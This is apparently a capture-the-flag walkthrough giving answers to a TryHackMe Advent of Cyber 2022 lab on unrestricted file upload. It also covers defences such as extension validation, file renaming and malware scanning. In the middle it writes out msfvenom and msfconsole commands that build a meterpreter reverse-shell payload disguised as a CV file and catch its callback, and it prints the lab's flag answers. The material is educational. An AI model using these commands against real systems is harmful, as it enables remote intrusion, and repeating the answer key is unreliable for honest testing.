Task 20 Answers — Advent of Cyber 2022 [Day 15] Secure Coding Santa is looking for a Sidekick

Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems.

Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation.

Start the Machine and Paste the IP of the Machine into a Browser!

If Needed, Connect with the TryHackMe’s VPN

1. What is the name given to file uploads that allow threat actors to upload any files that they want?

With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content — up to and including injecting malicious webpages, which lead to further vulnerabilities such as Cross-Site Scripting (XSS) or Cross-Site Request Forgery (CSRF)

Ans: Unrestricted

2. What is the title of the web application developed by Santa’s freelancer?

Ans: Santasidekick2

3. What is the value of the flag stored in the HR Elf’s Documents directory?

Just Upload a Dummy File!!

cv-username.exe CV file uploaded!! Santa’s team will review your CV and get in touch! Since Santa believes in Strong Security, the file has been stored outside the web root. No unethical elves allowed!

The Above Message ensures that a Person will Review the File, So we can Upload a Payload and wait for the Interaction

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-MACHINE-IP> LPORT=8080 -f exe -o cv-username.exe

Let’s Start the Reverse Handler!!

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <YOUR-MACHINE-IP>; set LPORT 8080; exploit"

Let’s Upload the Payload we Created in Home Directory to the Website and Wait for the Interaction!!

We Got the Reverse Connection!!

Now Let’s Exploit

We are in the system32 Directory so, let’s move back to C: Directory

cd ..
cd .. 
cd Users
cd HR_Elf
cd Documents
cat flag.txt

Ans: THM{Naughty.File.Uploads.Can.Get.You.RCE}

4. What defence technique can be implemented to ensure that specific file types can be uploaded?

To ensure that specific file types can be uploaded, We can verify the file extension. This will allow us to limit the type of files that can be uploaded.

Ans: file Extension validation

5. What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.

To counter these attempts, we can look to rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name

Ans: File Renaming

6. What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?

There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!

In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file

  Ans: Malware Scanning

Thank you for Reading!!

Happy Hacking ~

Queries:

THM , TryHackMe , TryHackMe Advent of Cyber 2022 , TryHackMe Advent of Cyber 4 Day 15, Ethical Hacking , Write up , Walk through , TryHackMe Advent of Cyber 2022 Day 15 Answers